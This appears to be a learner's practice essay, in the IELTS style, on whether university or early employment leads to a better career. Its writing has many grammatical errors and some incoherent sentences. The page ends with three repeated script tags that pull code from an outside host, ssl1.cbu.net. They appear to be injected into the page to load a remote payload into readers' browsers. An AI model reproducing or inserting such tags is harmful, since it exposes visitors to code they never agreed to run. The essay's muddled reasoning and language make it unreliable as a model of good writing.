Some people believe that studying at university or college is the best route to a successful career, while others believe that it is better to get a job straight after school. Discuss both views and give your opinion.

In today’s world, university has become an important part of young people, thereby they believe that is the best way to go to successful jobs. However, others think that it is better to get a job after high school.

Admittedly, there are some arguments in favour of young people thinking that a university degree is the best way to secure a good job. First, government subsidies for higher education are believed to equalize working opportunities among young adolescents. This college support, presumably, tends not only to increase the overall better jobs for students but also to mitigate their feeling of inferiority when finding a job, which promotes an egalitarian society. For example, in VietNam, almost all young people choose to go to university because they think that their skills and certification help them to have a higher salary. Moreover, many big companies always prioritize people completing their course at university. Second, people think that they can have a successful job when they study at university.This is a truth because it would result in a higher supply of highly qualified workers, which benefits society in the long run. In fact, it is acknowledged that skilled and knowledgeable human capital is imperative to foster economic growth and technological development in any nation.

On the other hand, other people think that just a monitor helps them to get a job after graduation. From one standpoint, university could help them to gain more knowledge and learn some skills they need to prepare for the workplace. Second, people think that it is just better to be straight when they complete their study because if they want to have a good job it depends on their talent and hard-work. It’s not over-reliant on the university. For instance, Japanese or Chinese students always do some part-time jobs in their leisure time to get more experience and they think that's the best way that they can prepare for their future career. It, instead, would be a more viable option if the resources were focused on supporting less privileged yet gifted people.

In conclusion, despite the long-term benefits of university. Meanwhile, students should focus more on developing themselves to get a better job. From my perspective, university is important but not the priority to secure jobs so people should learn more skills and experiences.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>